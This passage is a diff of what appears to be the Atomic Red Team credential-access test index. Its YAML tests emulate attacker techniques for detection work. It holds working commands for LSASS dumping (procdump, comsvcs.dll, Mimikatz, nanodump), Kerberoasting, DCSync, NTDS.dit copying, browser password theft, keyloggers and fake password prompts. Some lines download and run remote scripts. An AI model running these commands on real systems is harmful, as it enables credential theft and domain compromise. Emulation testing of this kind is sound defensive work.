'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' - description: 'Rubeus must exist - ' +' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} - ' +' executor: command: 'cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}" - ' +' cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore - ' +' name: powershell elevation_required: false T1552.003: @@ -393,7 +393,7 @@ credential-access: description: 'Search through bash history for specifice commands we want to capture - ' +' supported_platforms: - linux - macos @@ -415,7 +415,7 @@ credential-access: command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} - ' +' name: sh T1110: technique: @@ -650,7 +650,7 @@ credential-access: pod service account, for example) can access sensitive information that might include credentials to various services. - ' +' supported_platforms: - containers input_arguments: @@ -661,17 +661,17 @@ credential-access: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get secrets -n #{namespace} - ' +' name: bash elevation_required: false - name: Cat the contents of a Kubernetes service account token file @@ -679,7 +679,7 @@ credential-access: description: 'Access the Kubernetes service account access token stored within a container in a cluster. - ' +' supported_platforms: - linux dependency_executor_name: sh @@ -687,24 +687,24 @@ credential-access: - description: Verify docker is installed. prereq_command: 'which docker - ' +' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi - ' +' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker - ' +' get_prereq_command: 'sudo systemctl start docker - ' +' - description: Verify kind is in the path. prereq_command: 'which kind - ' +' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -712,14 +712,14 @@ credential-access: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters - ' +' get_prereq_command: 'sudo kind create cluster --name atomic-cluster - ' +' - description: Verify kubectl is in path prereq_command: 'which kubectl - ' +' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -727,19 +727,19 @@ credential-access: - description: Verify atomic-pod is running. prereq_command: 'kubectl --context kind-atomic-cluster get pods |grep atomic-pod - ' +' get_prereq_command: 'kubectl --context kind-atomic-cluster run atomic-pod --image=alpine --command -- sleep infinity - ' +' executor: command: 'kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token - ' +' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-pod - ' +' T1056.004: technique: external_references: @@ -841,7 +841,7 @@ credential-access: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications - ' +' supported_platforms: - windows input_arguments: @@ -857,10 +857,10 @@ credential-access: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) - ' +' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing @@ -946,7 +946,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. - ' +' supported_platforms: - linux input_arguments: @@ -958,16 +958,16 @@ credential-access: dependencies: - description: 'Requires SSHPASS - ' +' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; - ' +' executor: name: bash elevation_required: false @@ -979,7 +979,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. - ' +' supported_platforms: - macos input_arguments: @@ -991,11 +991,11 @@ credential-access: dependencies: - description: 'Requires SSHPASS - ' +' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" brew install hudochenkov/sshpass/sshpass @@ -1091,14 +1091,14 @@ credential-access: executor: command: 'python2 laZagne.py all - ' +' elevation_required: true name: bash - name: Extract passwords with grep auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 description: 'Extracting credentials from files - ' +' supported_platforms: - macos - linux @@ -1110,14 +1110,14 @@ credential-access: executor: command: 'grep -ri password #{file_path} - ' +' name: sh - name: Extracting passwords with findstr auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513 description: 'Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. - ' +' supported_platforms: - windows executor: @@ -1143,7 +1143,7 @@ credential-access: description: 'This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. - ' +' supported_platforms: - macos - linux @@ -1207,7 +1207,7 @@ credential-access: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { New-Object -COMObject "word.Application" | Out-Null @@ -1218,7 +1218,7 @@ credential-access: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -1227,7 +1227,7 @@ credential-access: cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore - ' +' name: powershell - name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] @@ -1254,7 +1254,7 @@ credential-access: command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'' -UseBasicParsing); Get-CredManCreds -Force - ' +' - name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] auto_generated_guid: 36753ded-e5c4-4eb5-bc3c-e8fba236878d @@ -1267,7 +1267,7 @@ credential-access: elevation_required: false command: 'vaultcmd /listcreds:"Windows Credentials" /all - ' +' - name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] auto_generated_guid: bc071188-459f-44d5-901a-f8f2625b2d2e @@ -1280,7 +1280,7 @@ credential-access: elevation_required: false command: 'vaultcmd /listcreds:"Web Credentials" /all - ' +' T1555.003: technique: created: '2020-02-12T18:57:36.041Z' @@ -1392,11 +1392,11 @@ credential-access: dependencies: - description: 'Modified Sysinternals must be located at #{file_path} - ' +' prereq_command: 'if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip" @@ -1409,7 +1409,7 @@ credential-access: cleanup_command: 'Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Search macOS Safari Cookies auto_generated_guid: c1402f7b-67ca-43a8-b5f3-3143abedc01b @@ -1446,10 +1446,10 @@ credential-access: dependencies: - description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path}) - ' +' prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}" @@ -1467,7 +1467,7 @@ credential-access: dependencies: - description: 'Chrome must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -1495,7 +1495,7 @@ credential-access: dependencies: - description: 'Opera must be installed - ' +' prereq_command: if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe") -Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1} @@ -1507,23 +1507,23 @@ credential-access: Stop-Process -Name "opera" - description: 'Opera login data file must exist - ' +' prereq_command: if (Test-Path "$env:APPDATA\Opera Software\Opera Stable\Login Data") {exit 0} else {exit 1} get_prereq_command: 'New-Item -Path "$env:APPDATA\Opera Software\Opera Stable\Login Data" -ItemType File - ' +' executor: name: powershell command: 'Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination $env:temp - ' +' cleanup_command: 'Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore - ' +' - name: Simulating access to Windows Firefox Login Data auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c description: | @@ -1535,7 +1535,7 @@ credential-access: dependencies: - description: 'Firefox must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1} @@ -1546,7 +1546,7 @@ credential-access: Start-Process $installer -ArgumentList '/S' -Wait - description: 'Firefox login data file must exist - ' +' prereq_command: if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1} get_prereq_command: | @@ -1560,7 +1560,7 @@ credential-access: command: 'Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force - ' +' cleanup_command: Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ig T1552.002: @@ -1620,7 +1620,7 @@ credential-access: description: 'Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. - ' +' supported_platforms: - windows executor: @@ -1638,7 +1638,7 @@ credential-access: executor: command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s - ' +' name: command_prompt T1003.006: technique: @@ -1755,7 +1755,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -1772,7 +1772,7 @@ credential-access: command: '#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit" - ' +' T1556.001: technique: external_references: @@ -1979,7 +1979,7 @@ credential-access: description: 'This module runs the Windows executable of PetitPotam in order to coerce authentication for a remote system. - ' +' supported_platforms: - windows input_arguments: @@ -2008,11 +2008,11 @@ credential-access: prereq_command: 'if (Test-Path "#{petitpotam_path}") { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd59c5afcaac67672b9ef2981/PetitPotam.exe?raw=true" -OutFile "#{petitpotam_path}" - ' +' executor: name: powershell elevation_required: false @@ -2161,7 +2161,7 @@ credential-access: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' - ' +' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -2292,7 +2292,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -2370,25 +2370,25 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' - description: 'Rubeus must exist - ' +' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} - ' +' executor: name: powershell elevation_required: false @@ -2482,26 +2482,26 @@ credential-access: files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: 'findstr /S cpassword %logonserver%\sysvol\*.xml - ' +' name: command_prompt - name: GPP Passwords (Get-GPPPassword) auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c @@ -2526,25 +2526,25 @@ credential-access: dependencies: - description: 'Get-GPPPassword PowerShell Script must exist at #{gpp_script_path} - ' +' prereq_command: 'if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } - ' +' get_prereq_command: | New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}" - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: | . #{gpp_script_path} @@ -2717,15 +2717,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -2760,37 +2760,37 @@ credential-access: description: command flags you would like to run (optional and blank by default) type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' - description: 'Rubeus must exist - ' +' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} - ' +' executor: command: | klist purge cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}" cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore - ' +' name: powershell elevation_required: false - name: Extract all accounts in use as SPN using setspn @@ -2810,19 +2810,19 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: 'setspn -T #{domain_name} -Q */* - ' +' name: command_prompt - name: Request A Single Ticket via PowerShell auto_generated_guid: 988539bc-2ed7-4e62-aec6-7c5cf6680863 @@ -2836,15 +2836,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: "Add-Type -AssemblyName System.IdentityModel\n$ComputerFQDN=$env:LogonServer.trimStart('\\') + \".\" + $env:UserDnsDomain\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken @@ -2867,15 +2867,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: "Add-Type -AssemblyName System.IdentityModel \nsetspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken @@ -3044,7 +3044,7 @@ credential-access: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -3063,14 +3063,14 @@ credential-access: dependencies: - description: 'Checking if pam_tty_audit.so is installed - ' +' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' - ' +' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" - ' +' supported_platforms: - linux executor: @@ -3101,14 +3101,14 @@ credential-access: - description: 'This test requires to be run in a bash shell and that logger and tee are installed. - ' +' prereq_command: | if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -3118,7 +3118,7 @@ credential-access: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND - ' +' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 description: "When a command is executed in bash, the BASH_COMMAND variable @@ -3135,14 +3135,14 @@ credential-access: dependencies: - description: 'This test requires to be run in a bash shell - ' +' prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' input_arguments: output_file: name: output_file @@ -3158,7 +3158,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm #{output_file} - ' +' - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. @@ -3166,20 +3166,20 @@ credential-access: of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'This test requires sshd and auditd - ' +' prereq_command: | if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" - ' +' input_arguments: user_account: description: Basic ssh user account for testing. @@ -3193,7 +3193,7 @@ credential-access: restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ - ' +' - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: "The linux audit tool auditd can be used to capture 32 and 64 bit @@ -3205,14 +3205,14 @@ credential-access: dependencies: - description: 'This test requires sshd and auditd - ' +' prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -3221,7 +3221,7 @@ credential-access: $(date +\"%d/%m/%y %H:%M:%S\") \n" cleanup_command: 'systemctl restart auditd - ' +' T1557.001: technique: external_references: @@ -3541,10 +3541,10 @@ credential-access: - description: 'Windows Credential Editor must exist on disk at specified location (#{wce_exe}) - ' +' prereq_command: 'if (Test-Path #{wce_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -3584,10 +3584,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) - ' +' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" @@ -3598,7 +3598,7 @@ credential-access: command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using comsvcs.dll @@ -3613,10 +3613,10 @@ credential-access: command: 'C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full - ' +' cleanup_command: 'Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Dump LSASS.exe Memory using direct system calls and API unhooking @@ -3639,10 +3639,10 @@ credential-access: - description: 'Dumpert executable must exist on disk at specified location (#{dumpert_exe}) - ' +' prereq_command: 'if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null @@ -3651,7 +3651,7 @@ credential-access: command: "#{dumpert_exe}\n" cleanup_command: 'del C:\windows\temp\dumpert.dmp >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using NanoDump @@ -3669,21 +3669,21 @@ credential-access: - description: 'NanoDump executable must exist on disk at specified location ($env:TEMP\nanodump.x64.exe) - ' +' prereq_command: 'if (Test-Path $env:TEMP\nanodump.x64.exe) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "$env:TEMP\nanodump.x64.exe" executor: command: '%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp" - ' +' cleanup_command: 'del "%temp%\nanodump.dmp" >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Windows Task Manager @@ -3726,10 +3726,10 @@ credential-access: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) - ' +' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -3739,19 +3739,19 @@ credential-access: Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force - description: 'Lsass dump must exist at specified location (#{input_file}) - ' +' prereq_command: 'cmd /c "if not exist #{input_file} (exit /b 1)" - ' +' get_prereq_command: 'Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)" - ' +' executor: command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit - ' +' name: command_prompt elevation_required: true - name: LSASS read with pypykatz @@ -3768,35 +3768,35 @@ credential-access: dependencies: - description: 'Computer must have python 3 installed - ' +' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' - description: 'Computer must have pip installed - ' +' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" - ' +' - description: 'pypykatz must be installed and part of PATH - ' +' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz - ' +' executor: command: 'pypykatz live lsa - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Out-Minidump.ps1 @@ -3813,7 +3813,7 @@ credential-access: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Create Mini Dump of LSASS.exe using ProcDump @@ -3841,10 +3841,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) - ' +' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force @@ -3854,7 +3854,7 @@ credential-access: command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Powershell Mimikatz @@ -3876,7 +3876,7 @@ credential-access: command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}''); Invoke-Mimikatz -DumpCreds - ' +' name: powershell elevation_required: true - name: Dump LSASS with .Net 5 createdump.exe @@ -3898,15 +3898,15 @@ credential-access: dependencies: - description: 'Computer must have createdump.exe from .Net 5 - ' +' prereq_command: 'if (Test-Path ''#{createdump_exe}'') {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe" - ' +' executor: command: | echo "Createdump Path #{createdump_exe}" @@ -3916,7 +3916,7 @@ credential-access: & "#{createdump_exe}" -u -f #{output_file} $ID cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Dump LSASS.exe using imported Microsoft DLLs @@ -3941,10 +3941,10 @@ credential-access: dependencies: - description: 'Computer must have xordump.exe - ' +' prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} @@ -3952,7 +3952,7 @@ credential-access: command: "#{xordump_exe} -out #{output_file} -x 0x41\n" cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore - ' +' name: powershell elevation_required: true T1557: @@ -4158,19 +4158,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' executor: command: 'vssadmin.exe create shadow /for=#{drive_letter} - ' +' name: command_prompt elevation_required: true - name: Copy NTDS.dit from Volume Shadow Copy @@ -4197,34 +4197,34 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' - description: 'Volume shadow copy must exist - ' +' prereq_command: 'if not exist #{vsc_name} (exit /b 1) - ' +' get_prereq_command: 'echo Run "Invoke-AtomicTest T1003.003 -TestName ''Create Volume Shadow Copy with vssadmin''" to fulfill this requirement - ' +' - description: 'Extract path must exist - ' +' prereq_command: 'if not exist #{extract_path} (exit /b 1) - ' +' get_prereq_command: 'mkdir #{extract_path} - ' +' executor: command: | copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit @@ -4256,22 +4256,22 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' executor: command: | mkdir #{output_folder} ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q cleanup_command: 'rmdir /q /s #{output_folder} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with WMI @@ -4290,19 +4290,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' executor: command: 'wmic shadowcopy call create Volume=#{drive_letter} - ' +' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy remotely with WMI @@ -4325,18 +4325,18 @@ credential-access: - description: 'Target must be a reachable Domain Controller, and current context must be domain admin - ' +' prereq_command: 'wmic /node:"#{target_host}" shadowcopy list brief - ' +' get_prereq_command: 'echo Sorry, can''t connect to target host, check: 